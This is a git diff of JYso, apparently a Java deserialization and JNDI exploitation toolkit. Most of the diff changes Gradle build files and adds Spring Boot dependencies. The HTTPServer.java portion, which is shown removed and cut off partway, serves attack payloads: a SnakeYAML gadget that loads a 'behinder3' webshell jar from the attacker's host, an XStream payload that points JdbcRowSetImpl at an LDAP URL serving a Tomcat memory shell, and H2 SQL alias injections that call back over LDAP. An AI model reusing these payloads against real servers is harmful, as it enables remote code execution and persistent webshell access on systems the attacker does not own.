diff --git a/.gitignore b/.gitignore
index 4939178..bb3a17b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,11 @@
-.idea/
-.gradle/
-out/
-.DS_Store
-/build
-1.ser
\ No newline at end of file
+.idea/
+.gradle/
+out/
+.DS_Store
+/build
+1.ser
+node_modules/
+bun.lockb
+src/main/frontend/dist/
+src/main/resources/static/
+.trae/
\ No newline at end of file
diff --git a/build.gradle b/build.gradle
index 2a86eea..67f75ff 100644
--- a/build.gradle
+++ b/build.gradle
@@ -1,8 +1,12 @@
+import com.github.jengelman.gradle.plugins.shadow.transformers.AppendingTransformer
+
plugins {
id 'java'
id 'java-library'
id 'maven-publish'
- id 'com.gradleup.shadow' version '9.4.1'
+ id 'com.github.johnrengelman.shadow' version '7.1.2'
+ id 'org.springframework.boot' version '2.7.18'
+ id 'io.spring.dependency-management' version '1.1.7'
}
repositories {
@@ -16,10 +20,30 @@ repositories {
}
}
+bootJar {
+ enabled = false
+ mainClass = 'com.qi4l.JYso.Starter'
+}
+
+springBoot {
+ mainClass = 'com.qi4l.JYso.Starter'
+}
+
+jar {
+ enabled = true
+}
+
shadowJar {
archiveClassifier = ''
zip64 = true
- minimize()
+ // minimize() // disabled: too many reflection-based libs get broken
+ mergeServiceFiles()
+ transform(AppendingTransformer) {
+ resource = 'META-INF/spring.factories'
+ }
+ transform(AppendingTransformer) {
+ resource = 'META-INF/spring/org.springframework.boot.autoconfigure.AutoConfiguration.imports'
+ }
manifest {
attributes 'Main-Class': 'com.qi4l.JYso.Starter'
}
@@ -33,6 +57,7 @@ configurations.configureEach {
dependencies {
implementation 'org.apache.logging.log4j:log4j-api:2.20.0'
implementation 'org.apache.logging.log4j:log4j-core:2.20.0'
+ implementation 'org.apache.logging.log4j:log4j-slf4j-impl:2.20.0'
implementation 'cn.hutool:hutool-all:5.7.7'
implementation 'com.alibaba:fastjson:1.2.83'
implementation 'com.alibaba.fastjson2:fastjson2:2.0.26'
@@ -59,13 +84,13 @@ dependencies {
implementation 'org.apache.commons:commons-text:1.8'
implementation 'org.apache.maven.plugins:maven-assembly-plugin:3.0.0'
implementation 'org.apache.myfaces.core:myfaces-impl:2.2.9'
- implementation 'org.apache.tomcat.embed:tomcat-embed-core:8.5.58'
- implementation 'org.apache.tomcat:tomcat-websocket:9.0.62'
+ implementation 'org.apache.tomcat.embed:tomcat-embed-core'
+ implementation 'org.apache.tomcat:tomcat-websocket:9.0.83'
implementation 'org.apache.wicket:wicket-util:6.23.0'
implementation 'org.aspectj:aspectjweaver:1.9.7'
implementation 'org.beanshell:bsh:2.0b5'
implementation 'org.clojure:clojure:1.8.0'
- implementation 'org.codehaus.groovy:groovy:2.4.5'
+ implementation 'org.codehaus.groovy:groovy:2.5.23'
implementation 'org.eclipse.jetty:jetty-ant:11.0.7'
implementation 'org.fusesource.jansi:jansi:2.4.0'
implementation 'org.glassfish.tyrus:tyrus-server:2.0.0'
@@ -81,17 +106,13 @@ dependencies {
implementation 'org.ow2.asm:asm:8.0.1'
implementation 'org.python:jython-standalone:2.5.2'
implementation 'org.reflections:reflections:0.9.10'
- implementation 'org.springframework:spring-aop:5.2.3.RELEASE'
- implementation 'org.springframework:spring-aop:5.2.3.RELEASE'
- implementation 'org.springframework:spring-beans:5.2.3.RELEASE'
- implementation 'org.springframework:spring-context-support:5.2.3.RELEASE'
- implementation 'org.springframework:spring-core:5.2.3.RELEASE'
- implementation 'org.springframework:spring-jdbc:5.2.3.RELEASE'
- implementation 'org.springframework:spring-oxm:5.2.3.RELEASE'
- implementation 'org.springframework:spring-test:5.2.3.RELEASE'
- implementation 'org.springframework:spring-tx:5.2.3.RELEASE'
- implementation 'org.springframework:spring-web:5.2.3.RELEASE'
- implementation 'org.springframework:spring-webmvc:5.2.3.RELEASE'
+ implementation 'org.springframework:spring-aop'
+ implementation 'org.springframework:spring-beans'
+ implementation 'org.springframework:spring-context-support'
+ implementation 'org.springframework:spring-core'
+ implementation 'org.springframework:spring-jdbc'
+ implementation 'org.springframework:spring-oxm'
+ implementation 'org.springframework:spring-tx'
implementation 'rhino:js:1.7R2'
implementation 'rome:rome:1.0'
implementation 'xerces:xercesImpl:2.12.0'
@@ -125,7 +146,14 @@ dependencies {
implementation 'commons-beanutils:commons-beanutils:1.9.4'
-
+ implementation('org.springframework.boot:spring-boot-starter-web') {
+ exclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'
+ exclude group: 'ch.qos.logback'
+ }
+ implementation('org.springframework.boot:spring-boot-starter-security') {
+ exclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'
+ exclude group: 'ch.qos.logback'
+ }
runtimeOnly libs.org.aspectj.aspectjweaver
compileOnly libs.org.apache.tomcat.tomcat.websocket
@@ -133,7 +161,7 @@ dependencies {
group = 'org.example'
-version = '1.3.7'
+version = '1.3.8'
description = 'JYso'
java.sourceCompatibility = JavaVersion.VERSION_1_8
diff --git a/gradle/wrapper/gradle-wrapper.properties b/gradle/wrapper/gradle-wrapper.properties
index c2a0de1..be6265b 100644
--- a/gradle/wrapper/gradle-wrapper.properties
+++ b/gradle/wrapper/gradle-wrapper.properties
@@ -1,6 +1,6 @@
#Thu Apr 23 23:23:32 CST 2026
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
-distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.4-bin.zip
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.6.4-bin.zip
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
diff --git a/gradlew b/gradlew
index 33ccca4..1aa94a4 100644
--- a/gradlew
+++ b/gradlew
@@ -1,249 +1,249 @@
-#!/bin/sh
-
-#
-# Copyright © 2015-2021 the original authors.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# https://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-
-##############################################################################
-#
-# Gradle start up script for POSIX generated by Gradle.
-#
-# Important for running:
-#
-# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is
-# noncompliant, but you have some other compliant shell such as ksh or
-# bash, then to run this script, type that shell name before the whole
-# command line, like:
-#
-# ksh Gradle
-#
-# Busybox and similar reduced shells will NOT work, because this script
-# requires all of these POSIX shell features:
-# * functions;
-# * expansions «$var», «${var}», «${var:-default}», «${var+SET}»,
-# «${var#prefix}», «${var%suffix}», and «$( cmd )»;
-# * compound commands having a testable exit status, especially «case»;
-# * various built-in commands including «command», «set», and «ulimit».
-#
-# Important for patching:
-#
-# (2) This script targets any POSIX shell, so it avoids extensions provided
-# by Bash, Ksh, etc; in particular arrays are avoided.
-#
-# The "traditional" practice of packing multiple parameters into a
-# space-separated string is a well documented source of bugs and security
-# problems, so this is (mostly) avoided, by progressively accumulating
-# options in "$@", and eventually passing that to Java.
-#
-# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS,
-# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly;
-# see the in-line comments for details.
-#
-# There are tweaks for specific operating systems such as AIX, CygWin,
-# Darwin, MinGW, and NonStop.
-#
-# (3) This script is generated from the Groovy template
-# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt
-# within the Gradle project.
-#
-# You can find Gradle at https://github.com/gradle/gradle/.
-#
-##############################################################################
-
-# Attempt to set APP_HOME
-
-# Resolve links: $0 may be a link
-app_path=$0
-
-# Need this for daisy-chained symlinks.
-while
- APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path
- [ -h "$app_path" ]
-do
- ls=$( ls -ld "$app_path" )
- link=${ls#*' -> '}
- case $link in #(
- /*) app_path=$link ;; #(
- *) app_path=$APP_HOME$link ;;
- esac
-done
-
-# This is normally unused
-# shellcheck disable=SC2034
-APP_BASE_NAME=${0##*/}
-# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036)
-APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit
-
-# Use the maximum available, or set MAX_FD != -1 to use that value.
-MAX_FD=maximum
-
-warn () {
- echo "$*"
-} >&2
-
-die () {
- echo
- echo "$*"
- echo
- exit 1
-} >&2
-
-# OS specific support (must be 'true' or 'false').
-cygwin=false
-msys=false
-darwin=false
-nonstop=false
-case "$( uname )" in #(
- CYGWIN* ) cygwin=true ;; #(
- Darwin* ) darwin=true ;; #(
- MSYS* | MINGW* ) msys=true ;; #(
- NONSTOP* ) nonstop=true ;;
-esac
-
-CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
-
-
-# Determine the Java command to use to start the JVM.
-if [ -n "$JAVA_HOME" ] ; then
- if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
- # IBM's JDK on AIX uses strange locations for the executables
- JAVACMD=$JAVA_HOME/jre/sh/java
- else
- JAVACMD=$JAVA_HOME/bin/java
- fi
- if [ ! -x "$JAVACMD" ] ; then
- die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
-
-Please set the JAVA_HOME variable in your environment to match the
-location of your Java installation."
- fi
-else
- JAVACMD=java
- if ! command -v java >/dev/null 2>&1
- then
- die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
-
-Please set the JAVA_HOME variable in your environment to match the
-location of your Java installation."
- fi
-fi
-
-# Increase the maximum file descriptors if we can.
-if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then
- case $MAX_FD in #(
- max*)
- # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked.
- # shellcheck disable=SC2039,SC3045
- MAX_FD=$( ulimit -H -n ) ||
- warn "Could not query maximum file descriptor limit"
- esac
- case $MAX_FD in #(
- '' | soft) :;; #(
- *)
- # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked.
- # shellcheck disable=SC2039,SC3045
- ulimit -n "$MAX_FD" ||
- warn "Could not set maximum file descriptor limit to $MAX_FD"
- esac
-fi
-
-# Collect all arguments for the java command, stacking in reverse order:
-# * args from the command line
-# * the main class name
-# * -classpath
-# * -D...appname settings
-# * --module-path (only if needed)
-# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables.
-
-# For Cygwin or MSYS, switch paths to Windows format before running java
-if "$cygwin" || "$msys" ; then
- APP_HOME=$( cygpath --path --mixed "$APP_HOME" )
- CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" )
-
- JAVACMD=$( cygpath --unix "$JAVACMD" )
-
- # Now convert the arguments - kludge to limit ourselves to /bin/sh
- for arg do
- if
- case $arg in #(
- -*) false ;; # don't mess with options #(
- /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath
- [ -e "$t" ] ;; #(
- *) false ;;
- esac
- then
- arg=$( cygpath --path --ignore --mixed "$arg" )
- fi
- # Roll the args list around exactly as many times as the number of
- # args, so each arg winds up back in the position where it started, but
- # possibly modified.
- #
- # NB: a `for` loop captures its iteration list before it begins, so
- # changing the positional parameters here affects neither the number of
- # iterations, nor the values presented in `arg`.
- shift # remove old arg
- set -- "$@" "$arg" # push replacement arg
- done
-fi
-
-
-# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
-DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"'
-
-# Collect all arguments for the java command:
-# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments,
-# and any embedded shellness will be escaped.
-# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be
-# treated as '${Hostname}' itself on the command line.
-
-set -- \
- "-Dorg.gradle.appname=$APP_BASE_NAME" \
- -classpath "$CLASSPATH" \
- org.gradle.wrapper.GradleWrapperMain \
- "$@"
-
-# Stop when "xargs" is not available.
-if ! command -v xargs >/dev/null 2>&1
-then
- die "xargs is not available"
-fi
-
-# Use "xargs" to parse quoted args.
-#
-# With -n1 it outputs one arg per line, with the quotes and backslashes removed.
-#
-# In Bash we could simply go:
-#
-# readarray ARGS < <( xargs -n1 <<<"$var" ) &&
-# set -- "${ARGS[@]}" "$@"
-#
-# but POSIX shell has neither arrays nor command substitution, so instead we
-# post-process each arg (as a line of input to sed) to backslash-escape any
-# character that might be a shell metacharacter, then use eval to reverse
-# that process (while maintaining the separation between arguments), and wrap
-# the whole thing up as a single "set" statement.
-#
-# This will of course break if any of these variables contains a newline or
-# an unmatched quote.
-#
-
-eval "set -- $(
- printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" |
- xargs -n1 |
- sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' |
- tr '\n' ' '
- )" '"$@"'
-
-exec "$JAVACMD" "$@"
+#!/bin/sh
+
+#
+# Copyright © 2015-2021 the original authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+##############################################################################
+#
+# Gradle start up script for POSIX generated by Gradle.
+#
+# Important for running:
+#
+# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is
+# noncompliant, but you have some other compliant shell such as ksh or
+# bash, then to run this script, type that shell name before the whole
+# command line, like:
+#
+# ksh Gradle
+#
+# Busybox and similar reduced shells will NOT work, because this script
+# requires all of these POSIX shell features:
+# * functions;
+# * expansions «$var», «${var}», «${var:-default}», «${var+SET}»,
+# «${var#prefix}», «${var%suffix}», and «$( cmd )»;
+# * compound commands having a testable exit status, especially «case»;
+# * various built-in commands including «command», «set», and «ulimit».
+#
+# Important for patching:
+#
+# (2) This script targets any POSIX shell, so it avoids extensions provided
+# by Bash, Ksh, etc; in particular arrays are avoided.
+#
+# The "traditional" practice of packing multiple parameters into a
+# space-separated string is a well documented source of bugs and security
+# problems, so this is (mostly) avoided, by progressively accumulating
+# options in "$@", and eventually passing that to Java.
+#
+# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS,
+# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly;
+# see the in-line comments for details.
+#
+# There are tweaks for specific operating systems such as AIX, CygWin,
+# Darwin, MinGW, and NonStop.
+#
+# (3) This script is generated from the Groovy template
+# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt
+# within the Gradle project.
+#
+# You can find Gradle at https://github.com/gradle/gradle/.
+#
+##############################################################################
+
+# Attempt to set APP_HOME
+
+# Resolve links: $0 may be a link
+app_path=$0
+
+# Need this for daisy-chained symlinks.
+while
+ APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path
+ [ -h "$app_path" ]
+do
+ ls=$( ls -ld "$app_path" )
+ link=${ls#*' -> '}
+ case $link in #(
+ /*) app_path=$link ;; #(
+ *) app_path=$APP_HOME$link ;;
+ esac
+done
+
+# This is normally unused
+# shellcheck disable=SC2034
+APP_BASE_NAME=${0##*/}
+# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036)
+APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit
+
+# Use the maximum available, or set MAX_FD != -1 to use that value.
+MAX_FD=maximum
+
+warn () {
+ echo "$*"
+} >&2
+
+die () {
+ echo
+ echo "$*"
+ echo
+ exit 1
+} >&2
+
+# OS specific support (must be 'true' or 'false').
+cygwin=false
+msys=false
+darwin=false
+nonstop=false
+case "$( uname )" in #(
+ CYGWIN* ) cygwin=true ;; #(
+ Darwin* ) darwin=true ;; #(
+ MSYS* | MINGW* ) msys=true ;; #(
+ NONSTOP* ) nonstop=true ;;
+esac
+
+CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
+
+
+# Determine the Java command to use to start the JVM.
+if [ -n "$JAVA_HOME" ] ; then
+ if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+ # IBM's JDK on AIX uses strange locations for the executables
+ JAVACMD=$JAVA_HOME/jre/sh/java
+ else
+ JAVACMD=$JAVA_HOME/bin/java
+ fi
+ if [ ! -x "$JAVACMD" ] ; then
+ die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+ fi
+else
+ JAVACMD=java
+ if ! command -v java >/dev/null 2>&1
+ then
+ die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+ fi
+fi
+
+# Increase the maximum file descriptors if we can.
+if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then
+ case $MAX_FD in #(
+ max*)
+ # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked.
+ # shellcheck disable=SC2039,SC3045
+ MAX_FD=$( ulimit -H -n ) ||
+ warn "Could not query maximum file descriptor limit"
+ esac
+ case $MAX_FD in #(
+ '' | soft) :;; #(
+ *)
+ # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked.
+ # shellcheck disable=SC2039,SC3045
+ ulimit -n "$MAX_FD" ||
+ warn "Could not set maximum file descriptor limit to $MAX_FD"
+ esac
+fi
+
+# Collect all arguments for the java command, stacking in reverse order:
+# * args from the command line
+# * the main class name
+# * -classpath
+# * -D...appname settings
+# * --module-path (only if needed)
+# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables.
+
+# For Cygwin or MSYS, switch paths to Windows format before running java
+if "$cygwin" || "$msys" ; then
+ APP_HOME=$( cygpath --path --mixed "$APP_HOME" )
+ CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" )
+
+ JAVACMD=$( cygpath --unix "$JAVACMD" )
+
+ # Now convert the arguments - kludge to limit ourselves to /bin/sh
+ for arg do
+ if
+ case $arg in #(
+ -*) false ;; # don't mess with options #(
+ /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath
+ [ -e "$t" ] ;; #(
+ *) false ;;
+ esac
+ then
+ arg=$( cygpath --path --ignore --mixed "$arg" )
+ fi
+ # Roll the args list around exactly as many times as the number of
+ # args, so each arg winds up back in the position where it started, but
+ # possibly modified.
+ #
+ # NB: a `for` loop captures its iteration list before it begins, so
+ # changing the positional parameters here affects neither the number of
+ # iterations, nor the values presented in `arg`.
+ shift # remove old arg
+ set -- "$@" "$arg" # push replacement arg
+ done
+fi
+
+
+# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
+DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"'
+
+# Collect all arguments for the java command:
+# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments,
+# and any embedded shellness will be escaped.
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be
+# treated as '${Hostname}' itself on the command line.
+
+set -- \
+ "-Dorg.gradle.appname=$APP_BASE_NAME" \
+ -classpath "$CLASSPATH" \
+ org.gradle.wrapper.GradleWrapperMain \
+ "$@"
+
+# Stop when "xargs" is not available.
+if ! command -v xargs >/dev/null 2>&1
+then
+ die "xargs is not available"
+fi
+
+# Use "xargs" to parse quoted args.
+#
+# With -n1 it outputs one arg per line, with the quotes and backslashes removed.
+#
+# In Bash we could simply go:
+#
+# readarray ARGS < <( xargs -n1 <<<"$var" ) &&
+# set -- "${ARGS[@]}" "$@"
+#
+# but POSIX shell has neither arrays nor command substitution, so instead we
+# post-process each arg (as a line of input to sed) to backslash-escape any
+# character that might be a shell metacharacter, then use eval to reverse
+# that process (while maintaining the separation between arguments), and wrap
+# the whole thing up as a single "set" statement.
+#
+# This will of course break if any of these variables contains a newline or
+# an unmatched quote.
+#
+
+eval "set -- $(
+ printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" |
+ xargs -n1 |
+ sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' |
+ tr '\n' ' '
+ )" '"$@"'
+
+exec "$JAVACMD" "$@"
diff --git a/src/main/java/com/qi4l/JYso/HTTPServer.java b/src/main/java/com/qi4l/JYso/HTTPServer.java
index b035bdd..95059b5 100644
--- a/src/main/java/com/qi4l/JYso/HTTPServer.java
+++ b/src/main/java/com/qi4l/JYso/HTTPServer.java
@@ -1,526 +1,527 @@
-package com.qi4l.JYso;
-
-import cn.hutool.core.io.file.FileReader;
-import com.qi4l.JYso.gadgets.Config.Config;
-import com.qi4l.JYso.gadgets.utils.Utils;
-import com.qi4l.JYso.template.ReverseShellTemplate;
-import com.sun.net.httpserver.HttpExchange;
-import com.sun.net.httpserver.HttpServer;
-import javassist.ClassPool;
-import javassist.CtClass;
-import org.apache.commons.lang3.reflect.FieldUtils;
-import org.apache.logging.log4j.LogManager;
-import org.apache.logging.log4j.Logger;
-
-import java.io.ByteArrayOutputStream;
-import java.io.File;
-import java.io.IOException;
-import java.net.InetSocketAddress;
-import java.nio.charset.StandardCharsets;
-import java.nio.file.Files;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.jar.JarOutputStream;
-import java.util.zip.ZipEntry;
-
-import static org.fusesource.jansi.Ansi.ansi;
-
-@SuppressWarnings("HttpUrlsUsage")
-public class HTTPServer {
- private static final Logger log = LogManager.getLogger(HTTPServer.class);
- // 获取根目录路径
- public static String cwd = System.getProperty("user.dir");
-
- public static void start() throws IOException {
-
- HttpServer httpServer = HttpServer.create(new InetSocketAddress(Config.httpPort), 0);
- httpServer.createContext("/", httpExchange -> {
- try {
- System.out.println(ansi().render("@|green [+]|@ New HTTP Request From >>" + httpExchange.getRemoteAddress() + " " + httpExchange.getRequestURI()));
-
- String qi = String.valueOf(httpExchange.getRequestURI());
-
-
- if (qi.contains("setPathAlias")) {
- Config.BCEL1 = qi.substring(qi.indexOf("=") + 1);
- System.out.println(ansi().render("@|green [+]|@ 获取参数成功 >> " + Config.BCEL1));
- } else if (qi.contains("setRoute")) {
- Config.ROUTE = qi.substring(qi.indexOf("=") + 1);
- System.out.println(ansi().render("@|green [+]|@ 获取路由成功 >> " + Config.ROUTE));
- }
-
- String path = httpExchange.getRequestURI().getPath();
- if (path.endsWith(".class")) {
- handleClassRequest(httpExchange);
- } else if (path.endsWith(".wsdl")) {
- handleWSDLRequest(httpExchange);
- } else if (path.endsWith(".jar")) {
- handleJarRequest(httpExchange);
- } else if (path.startsWith("/xxelog")) {
- handleXXELogRequest(httpExchange);
- } else if (path.endsWith(".sql")) {
- handleSQLRequest(httpExchange);
- } else if (path.endsWith(".groovy")) {
- handlerGroovyRequest(httpExchange);
- } else if (path.endsWith(".xml")) {
- handleXMLRequest(httpExchange);
- } else if (path.endsWith(".txt")) {
- handleTXTRequest(httpExchange);
- } else if (path.endsWith(".yml")) {
- handleYmlRequest(httpExchange);
- } else {
- handleFileRequest(httpExchange);
- }
- } catch (Exception e) {
- log.error("e: ", e);
- }
- });
-
- httpServer.setExecutor(null);
- httpServer.start();
- System.out.println(ansi().render("@|green [+]|@ HTTP Server Start Listening on >> " + Config.httpPort + "..."));
- }
-
- private static void handleFileRequest(HttpExchange exchange) throws Exception {
- System.out.println("[-] 请求的后缀不对");
- String path = exchange.getRequestURI().getPath();
- String filename = cwd + File.separator + "data" + File.separator + path.substring(path.lastIndexOf("/") + 1);
- File file = new File(filename);
- serveFileContent(exchange, file, null, null);
- exchange.close();
-
- }
-
- private static void handleYmlRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
-// String host = exchange.getRequestURI().getHost();
- String YamlName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
- String bytes = "!!javax.script.ScriptEngineManager [\n" +
- " !!java.net.URLClassLoader [[\n" +
- " !!java.net.URL [\"http://" + Config.ip + ":" + Config.httpPort + "/behinder3.jar\"]\n" +
- " ]]\n" +
- "]\n";
-
- if (YamlName.equalsIgnoreCase("snake")) {
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
-// exchange.getResponseHeaders().set("Content-type","application/octet-stream");
- exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
-// exchange.sendResponseHeaders(200, yaml.getObject().length + 1);
- exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
-// exchange.getResponseBody().write(yaml.getObject("UTF-8"));
- } else {
- String pa = cwd + File.separator + "data";
- File file = new File(pa + File.separator + YamlName + ".yml");
- serveFileContent(exchange, file, "Content-type", "application/octet-stream");
-
- }
- exchange.close();
- }
-
- public static void handleTXTRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
- String txtname = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
- if (txtname.equalsIgnoreCase("isok")) {
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
- byte[] bytes = "success!".getBytes();
- exchange.getResponseHeaders().set("Content-type", "application/octet-stream");
- exchange.sendResponseHeaders(200, bytes.length + 1);
- exchange.getResponseBody().write(bytes);
- } else {
- String pa = cwd + File.separator + "data";
- File file = new File(pa + File.separator + txtname + ".txt");
-
- serveFileContent(exchange, file, "Content-type", "application/octet-stream");
- }
- exchange.close();
- }
-
- public static void handleXMLRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
-// String host = exchange.getRequestURI().getHost();
- String xmlName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
- String bytes = "\n \n";
- String xstream = "\n" +
- " \n" +
- " 0\n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " false\n" +
- " 0\n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " 1008\n" +
- " true\n" +
- " 1000\n" +
- " 0\n" +
- " 2\n" +
- " 0\n" +
- " 0\n" +
- " 0\n" +
- " true\n" +
- " 1004\n" +
- " false\n" +
- " ldap://" + Config.ip + ":1389/basic/TomcatMemShell3\n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " -1\n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " com.sun.rowset.JdbcRowSetImpl\n" +
- " getDatabaseMetaData\n" +
- " \n" +
- " \n" +
- " foo\n" +
- " \n" +
- " foo\n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " false\n" +
- " 0\n" +
- " 0\n" +
- " false\n" +
- " \n" +
- " false\n" +
- " \n" +
- " \n" +
- " \n" +
- " 0\n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- " \n" +
- "";
-
- if (xmlName.equals("a")) {
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
-
-
- exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
- exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
- } else if (xmlName.equals("x")) {
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
- exchange.getResponseHeaders().add("Content-Type", "application/xml; charset=utf-8");
- exchange.sendResponseHeaders(200, xstream.getBytes().length + 1);
- exchange.getResponseBody().write(xstream.getBytes(StandardCharsets.UTF_8));
-
- } else {
- String pa = cwd + File.separator + "data";
- File file = new File(pa + File.separator + xmlName + ".xml");
-
- serveFileContent(exchange, file, "Content-Type", "application/xml; charset=utf-8");
-
- }
- exchange.close();
-
- }
-
- public static void handleSQLRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
- String host = exchange.getRequestURI().getHost();
- String sqlName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
-
- if (sqlName.equalsIgnoreCase("echo")) {
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
-
- String name = String.valueOf(System.nanoTime());
- String bytes = "CREATE ALIAS " + name + " AS CONCAT('void ex()throws Exception" +
- "{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap://" + host + ":1389/TomcatBypass/TomcatEcho\");',' 'o.setAutoCommit(\"true\");,'}');" +
- "CALL " + name + "();\"}";
- exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
- exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
- } else if (sqlName.equalsIgnoreCase("inject")) {
- System.out.println("@|green Response Code: |@" + 200);
-
- String name = String.valueOf(System.nanoTime());
- String bytes = "CREATE ALIAS " + name + " AS CONCAT('void ex()throws Exception" +
- "{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap:// + host + :1389/inject.class\");',' 'o.setAutoCommit(\"true\");,'}');" +
- "CALL " + name + "();\"}";
- exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
- exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
-
- } else {
-
- String pa = cwd + File.separator + "data";
- File file = new File(pa + File.separator + sqlName + ".sql");
-
